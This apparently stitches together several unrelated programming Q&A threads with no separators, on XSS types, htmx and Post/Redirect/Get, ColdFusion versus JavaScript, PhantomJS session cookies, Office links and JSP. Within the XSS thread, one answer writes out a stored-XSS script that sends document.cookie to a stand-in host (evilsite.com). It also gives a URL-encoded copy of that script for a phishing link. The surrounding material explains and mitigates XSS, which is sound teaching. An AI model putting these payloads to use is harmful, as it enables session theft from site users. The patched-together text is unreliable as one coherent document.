What is a clear explanation of the difference between server XSS and client XSS?
I read the explanation on the OWASP site, but it wasn't very clear to me. I know the reflected, stored and DOM-based types.
First, to set the scene for anyone else finding this question, here is the text from the OWASP Types of Cross-Site Scripting page:
Server XSS
Server XSS occurs when untrusted user supplied data is included in an HTML response generated by the server. The source of
this data could be from the request, or from a stored location. As
such, you can have both Reflected Server XSS and Stored Server XSS.
In this case, the entire vulnerability is in server-side code, and the
browser is simply rendering the response and executing any valid
script embedded in it.
Client XSS
Client XSS occurs when untrusted user supplied data is used to update
the DOM with an unsafe JavaScript call. A JavaScript call is
considered unsafe if it can be used to introduce valid JavaScript into
the DOM. The source of this data could be from the DOM, or it could
have been sent by the server (via an AJAX call, or a page load). The
ultimate source of the data could have been from a request, or from a
stored location on the client or the server. As such, you can have
both Reflected Client XSS and Stored Client XSS.
This redefines XSS into two categories: Server and Client.
Server XSS means that the data comes directly from the server onto the page. For example, the data containing the unsanitized text is from the HTTP response that made up the vulnerable page.
Client XSS means that the data comes from JavaScript which has manipulated the page. So it is JavaScript that has added the unsanitized text to the page, rather than it being in the page at that location when it was first loaded in the browser.
Example of Server XSS
An ASP (or ASP.NET) page outputs a variable, taken directly from the database, into the HTML page as it is generated:
<%=firstName %>
As firstName is not HTML encoded, a malicious user may have entered their first name as <script>alert('foo')</script>, causing a successful XSS attack.
Another example is outputting a variable that passes through the server without first being stored:
<%=Request.Form["FirstName"] %>
Example of Client XSS*
<script type="text/javascript">
function loadXMLDoc() {
    var xmlhttp;
    if (window.XMLHttpRequest) {
        // code for IE7+, Firefox, Chrome, Opera, Safari
        xmlhttp = new XMLHttpRequest();
    } else {
        // code for IE6, IE5
        xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
    }
    xmlhttp.onreadystatechange = function() {
        if (xmlhttp.readyState == 4) {
            if (xmlhttp.status == 200) {
                document.getElementById("myDiv").innerHTML = xmlhttp.responseText;
            } else if (xmlhttp.status == 400) {
                alert('There was an error 400');
            } else {
                alert('something else other than 200 was returned');
            }
        }
    };
    xmlhttp.open("GET", "get_first_name.aspx", true);
    xmlhttp.send();
}
</script>
Note that our get_first_name.aspx method does no encoding of the returned data, as it is a web service method that is also used by other systems (the content type is set to text/plain). Our JavaScript code sets innerHTML to this value, so it is vulnerable to Client XSS. To avoid Client XSS in this instance, innerText should be used instead of innerHTML, which will not result in HTML characters being interpreted. Even better, use textContent, as some browsers (notably older Firefox versions) do not support the non-standard innerText property.
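For example, a minimal fix for the snippet above (reusing the same myDiv element) is to assign the response to textContent, so the browser treats it as plain text rather than markup:
// Safe alternative: the response is inserted as plain text and never parsed as HTML
document.getElementById("myDiv").textContent = xmlhttp.responseText;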
* code adapted from this answer.
SilverlightFox has explained everything well, but I would like to add some examples.
Server XSS:
So let's say we found a vulnerable website that doesn't properly handle the comment box text. We create a new comment and type in:
<p>This picture gives me chills</p>
<script>img=new Image();img.src="http://www.evilsite.com/cookie_steal.php?cookie="+document.cookie+"&url="+document.domain;</script>
We also create a PHP script that saves both GET values into a text file, and we can then proceed to steal users' cookies. The cookies get sent EACH TIME someone loads the injected comment, and the victim never sees it coming (they only see the "This picture gives me chills" comment).
Client XSS:
Let's say we found a website that has a vulnerable search bar and renders the HTML we search for into the results page. To test that, simply search for something like:
<font color="red">Test</font>
If the search results show the word "Test" in red, the search engine is vulnerable to client XSS. An attacker can then use the website's personal messages/e-mails to send users an innocent-looking URL. This could look like:
Hello, I recently had a problem with this website's search engine.
Please click on following link:
http://www.vulnerable-site.com/search.php?q=%3C%73%63%72%69%70%74%3E%69%6D%67%3D%6E%65%77%20%49%6D%61%67%65%28%29%3B%69%6D%67%2E%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%73%69%74%65%2E%63%6F%6D%2F%63%6F%6F%6B%69%65%5F%73%74%65%61%6C%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2B%22%26%75%72%6C%3D%22%2B%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%3B%3C%2F%73%63%72%69%70%74%3E
When anyone clicks the link, the code runs in their browser (it's encoded into URL characters, because otherwise users might spot the script in the URL), doing the same thing as the script above: stealing the user's cookies.
However, if you use this without the website owner's approval, you're breaking the law.
Keep that in mind, and use my examples to fix XSS holes on your website.
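If you do have to build markup on the client, a small encoding helper can neutralise the characters these payloads rely on. This is only a sketch (the function name is my own, and server-side encoding remains the primary fix):
function escapeHTML(str) {
    // Escape the five HTML-significant characters before inserting untrusted text into markup
    return String(str)
        .replace(/&/g, "&amp;")
        .replace(/</g, "&lt;")
        .replace(/>/g, "&gt;")
        .replace(/"/g, "&quot;")
        .replace(/'/g, "&#39;");
}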
In the past I used the Post/Redirect/Get pattern:
the html form was submitted to the server via POST
the server processed the data
if everything was OK, the server responded with an HTTP 302 (redirect)
the client redirected to the new location
Is this still needed if you submit html fragments via htmx?
By and large no, you will not need to implement the PRG pattern.
Since htmx uses AJAX for most interactions, there is no request sitting in the browser history, and hitting refresh will not re-submit a POST (or DELETE or whatever).
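For illustration, here is a minimal sketch using htmx's JavaScript API (the /register endpoint and #result target are made up): the POST goes out as an XHR and the returned fragment is swapped into the page, so there is no POST navigation for a refresh to replay.
// Hypothetical endpoint and target: htmx issues the POST via XHR and
// swaps the returned HTML fragment into #result
htmx.ajax('POST', '/register', { target: '#result', swap: 'innerHTML' });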
That said, htmx tries to be compatible with the PRG pattern, and updates the URL if a redirect occurs by detecting the final response URL:
https://github.com/bigskysoftware/htmx/blob/1d4c79490e491813ffb780354ec5df6d080b1e09/src/htmx.js#L2146
https://github.com/bigskysoftware/htmx/blob/1d4c79490e491813ffb780354ec5df6d080b1e09/src/htmx.js#L1851
If you do something like inline editing:
https://htmx.org/examples/click-to-edit/
The point becomes moot to a large extent, since you can have the edit UI at the same URL as the view URL.
Can I use ColdFusion tags in JavaScript? For example:
<script language="javascript" type="text/javascript">
    function validateUser() {
        var userName = document.getElementById("username");
        <CFQUERY DATASOURCE="mydatasourcename" NAME="getUser">
            select USER_ID, COUNT(*) from user u
            where u.firstname = userName;
        </CFQUERY>
        <cfif getUser.recordCount EQ 0>
            <!--- Show error message --->
        <cfelse>
            <!--- Assign userId to hidden field --->
            document.getElementById("userid").value = #USER_ID#;
        </cfif>
    }
</script>
<input type='textbox' name='username' id='username' onblur=validateUser()/>
<input type='hidden' name='userid' id='userid'/>
When the end user enters their username, I would like to check in the database whether this username exists. If it exists, I have to put the userid in the hidden field; otherwise throw an error.
Am I doing this correctly? If it is wrong, could you suggest the correct way?
Long version: http://blog.adamcameron.me/2012/10/the-coldfusion-requestresponse-process.html
Short version: no, you're not doing it right.
Mid-sized StackOverflow-friendly version: CFML code runs on the server side of a request; JavaScript runs on the client browser. And to be clear: the ColdFusion server never communicates with the browser directly at all: there's a web server in between. The client browser requests a file, the web server is configured to pass .cfm requests to the ColdFusion server, and it runs its code, returning the resulting string (eg: an HTML web page) to the web server which then returns that to the browser. That HTML might include JavaScript (inline or as external requests) which the browser will then execute.
Hopefully from that you can see that there's no direct interaction between server-side code and client-side code.
You do have two facilities at your disposal to get the two sides communicating, though. Firstly: CFML code writes out text, but that text can be JS which the browser then runs when it finally receives it. Something like:
<cfset msg ="G'day world">
<script>alert("<cfoutput>#msg#</cfoutput>");</script>
Once the CFML server has processed that, what gets sent back to the browser is:
<script>alert("G'day world");</script>
In this way, server-side data can be used in a client-side process if the server-side code "writes out" the data as part of its response. The example above is very trivial and not a "good practice" way of going about this, but it demonstrates the technique.
If you need to use JS code on the client to communicate back with the server, your only (real) recourse is to make an AJAX request back to the server, passing it client-side information for further server-side processing, and having the server respond with something. It is outwith the scope of your question to explain how best to do this, but there is a tonne of information out there on how to do it.
CFML provides some "wizards" to write HTML and JS out for you to facilitate this, but on the whole this is a bad approach to achieving this end, so I will not recommend it. However I will point you to a project which offers HTML/JS/CSS solutions to the inbuilt CFML wizardry: https://github.com/cfjedimaster/ColdFusion-UI-the-Right-Way
Back to the short answer: no, you cannot do what you are setting out to do for very good reasons, but if you revise your approach, you can achieve the ends that you want.
What you need to look at is passing the form fields back to the server via AJAX (jQuery makes this very easy), and running your <cfquery> code in a separate request.
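As a rough sketch of the client-side half (the checkUsername.cfm endpoint and its JSON response shape are made up for illustration):
// Hypothetical endpoint: a separate .cfm template that runs the <cfquery>
// and returns JSON such as {"exists": true, "userId": 42}
$.get("checkUsername.cfm", { username: $("#username").val() }, function (data) {
    if (data.exists) {
        $("#userid").val(data.userId);
    } else {
        alert("Username not found");
    }
}, "json");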
If you read that blog article I mentioned at the outset (disclosure: I wrote it, but I wrote it specifically for situations like this), then you'll understand why.
If you get stuck when working on part of your solution: raise another question more focused on whatever part you are stuck on.
I found an interesting issue when attempting to login using PhantomJS. I'm at a loss as to why it's actually occurring.
Basically you start up a remote debugger like so:
/usr/local/bin/phantomjs --web-security=no --remote-debugger-port=13379 --remote-debugger-autorun=yes /tmp/test.js
Within the remote debugger:
> location.href = "https://www.mysite.com/login"
> $('input[name="username_or_email"]').val('blah#email.com')
> $('input[name="password"]').val('wrongpassword')
> $('button[type="submit"]').submit()
Doing this in Chrome will give me the correct "wrong password" message after the XHR request, whereas using phantomjs gives me a generic error as no cookie is sent with phantomjs (I examined the headers).
I'm quite confused on why phantomjs doesn't send the cookie with the POST request. Does anyone know how we can get phantomjs to send the cookie with ALL requests as it should? Setting a cookie-file doesn't make any difference either.
OK, this seems to be related to session cookies, not regular cookies.
Here's a huge thread with the developer in charge of the cookies feature of PhantomJS and some people who have the same issue as yours:
https://groups.google.com/forum/#!msg/phantomjs/2UbPkIibnDg/JLV9jBKxhIQJ
If you don't want to skim through the entire thread, basically:
PhantomJS behaves like a regular browser and deletes all session cookies when the browser closes; in your case, when your script execution ends.
So even if you set the --cookies-file=/path/to/cookies.txt option, only regular cookies will be stored in it for subsequent executions.
There are two possible approaches for you: make all requests within the same script, or store and restore the cookies manually.
In the thread there are a couple of functions that you can use to do this:
function saveCookies(sessionCookieFile, page) {
    var fs = require("fs");
    // Persist the page's current cookies (session cookies included) to disk
    fs.write(sessionCookieFile, JSON.stringify(page.cookies), "w");
}

function restoreCookies(sessionCookieFile, page) {
    var fs = require("fs");
    // Load the saved cookies and reattach them to the page
    var cookies = fs.read(sessionCookieFile);
    page.cookies = JSON.parse(cookies);
}

var page = require('webpage').create();
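A rough usage sketch (the cookie file path and URL are made up): restore any previously saved cookies before navigating, and save them again before exiting:
var fs = require("fs");
var cookieFile = "/tmp/session_cookies.json"; // hypothetical path
if (fs.exists(cookieFile)) {
    restoreCookies(cookieFile, page);
}
page.open("https://www.mysite.com/login", function (status) {
    // ... drive the login form here, then persist the session cookies
    saveCookies(cookieFile, page);
    phantom.exit();
});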
And if everything fails...
You could download the source code and recompile PhantomJS.
You will need to edit src/cookiejar.cpp and remove or comment out purgeSessionCookies();
Hope this helps.
Been trying to figure this out for an hour now and I'm stymied. Simple site that allows employees to register. Typically the employer has a company-wide u/p for all employees to use to access the registration page, but the client also wanted a way to give employees a link that auto-logs them in to register.
Simple enough - created a page "r.cfm" that looks for URL.emid (encrypted employer ID) and URL.h (5 character hash as a check based on the decrypted employer ID). A full URL may look something like this:
https://www.domain.com/r.cfm?emid=22EBCA&h=F5DEA
r.cfm makes sure the correct URL vars are there, decrypts the emid, compares the check value and if all is correct sets some session vars as such:
<cflock scope="session" type="exclusive" timeout="10">
<cfset SESSION.LOGGEDIN = TRUE/>
<cfset SESSION.LOGIN.EMPLOYEE.COID = DecryptString(url.emid)/>
</cflock>
I then use CFHEADER with a 302 status and a location header to send them on to the next page. Here's where it gets weird. On the next page I set up some test code to e-mail me a dump of the session.
If the link is clicked directly in MS Word, I get to the 2nd page (the one from the cfheader redirect, employeeRegister.cfm) and I get not one but two e-mail dumps of the session. The first one shows logged in as true, but the 2nd one shows it as false, with a different jsessionid.
If I take the exact same link and paste it into my browser, it works as expected: one e-mail with a session dump showing SESSION.LOGGEDIN as true.
There is nothing on employeeRegister.cfm that would initiate a page reload. It actually doesn't even check the SESSION.LOGGEDIN var until the following page. employeeRegister.cfm is simply terms and conditions and a submit button to go to the next page, which is where the session vars are read and checked. It is literally a div with text and then a form tag with accept / decline.
This is because the Office product initially tries to act as the browser (to test for web authoring) instead of handing off control to the browser right away. By the time the browser gets control of the URL, a valid session doesn't exist, because Office isn't going to share cookies. Without a valid session cookie you end up getting logged out during subsequent redirects or navigation of the site in question.
These MS KB articles should help you solve the problem:
http://support.microsoft.com/kb/899927 <- mostly
http://support.microsoft.com/kb/218153 <- more info about Office links
I'm in a position where I get a value from JavaScript (which uses RaphaelJS) and need to send it to a Servlet/JSP page for display and DB-related work. Kindly assist me with that.
You are going to have to use AJAX for this one. Be sure to load jQuery so it's easy to do.
Simply collect the variable's value and send it to the JSP using .get or .post. Then you can validate the value sent in the JSP and do whatever you want with it.
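A minimal sketch (saveValue.jsp and the parameter name are made up; on the server, read the value with request.getParameter("chartValue")):
// myRaphaelValue holds whatever value your Raphael code produced (hypothetical)
$.post("saveValue.jsp", { chartValue: myRaphaelValue }, function (response) {
    // response is whatever the JSP renders back
    console.log("Server said: " + response);
});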
Hope this helps!
Jorge C.
As far as I understand, this is not Raphael-related.
What you need to make sure of is that you understand the difference between client side and server side. JavaScript runs client side in the browser (given we're not talking about a server-side application written with JS/Node.js), while JSPs are executed on the server.
If you collect values via JS and want the server to process them, you can either send them to the server with an AJAX request (which won't reload the page) or populate a form and submit it (which will then be a GET or POST request and will reload the whole page).
On the server you can accept the values, process them, and then render the response.
For AJAX requests you could look at jQuery.